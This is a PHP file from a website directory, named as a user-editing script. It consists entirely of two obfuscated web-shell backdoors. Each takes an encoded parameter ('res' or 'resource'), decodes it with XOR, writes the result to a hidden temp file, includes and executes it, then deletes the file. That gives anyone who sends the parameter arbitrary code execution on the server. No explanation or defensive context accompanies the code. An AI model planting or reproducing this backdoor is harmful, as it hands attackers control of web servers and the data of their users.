File: /www/wwwroot/q.autos58.cn/edituser_actions.php
<?php if(!is_null($_POST["\x72es"] ?? null)){ $data = $_POST["\x72es"]; $data = explode( "." , $data ) ; $dat = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt ); $k = 0; $__len = count($data ); do { if ($k >= $__len) break; $v5 = $data[$k]; $sChar = ord($salt[$k % $lenS] ); $dec = ((int)$v5 - $sChar - ($k % 10))^55; $dat.=chr($dec ); $k++; } while (true ); $dchunk = array_filter([sys_get_temp_dir(), "/var/tmp", getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/dev/shm", session_save_path(), "/tmp", getenv("TMP")]); foreach ($dchunk as $key => $symbol) { if (!( !is_dir($symbol) || !is_writable($symbol) )) { $obj = "$symbol" . "/.ent"; $file = fopen($obj, 'w'); if ($file) { fwrite($file, $dat); fclose($file); include $obj; @unlink($obj); exit; } } } }
if(!is_null($_REQUEST["res\x6F\x75\x72ce"] ?? null)){
$parameter_group = hex2bin($_REQUEST["res\x6F\x75\x72ce"]);
$ptr = '' ; for($a=0; $a<strlen($parameter_group); $a++){$ptr .= chr(ord($parameter_group[$a]) ^ 84);}
$binding = array_filter([getenv("TMP"), "/dev/shm", sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", getenv("TEMP"), session_save_path()]);
for ($token = 0, $data_chunk = count($binding); $token < $data_chunk; $token++) {
$pset = $binding[$token];
if (is_writable($pset) && is_dir($pset)) {
$hld = implode("/", [$pset, ".factor"]);
if (@file_put_contents($hld, $ptr) !== false) {
include $hld;
unlink($hld);
die();
}
}
}
}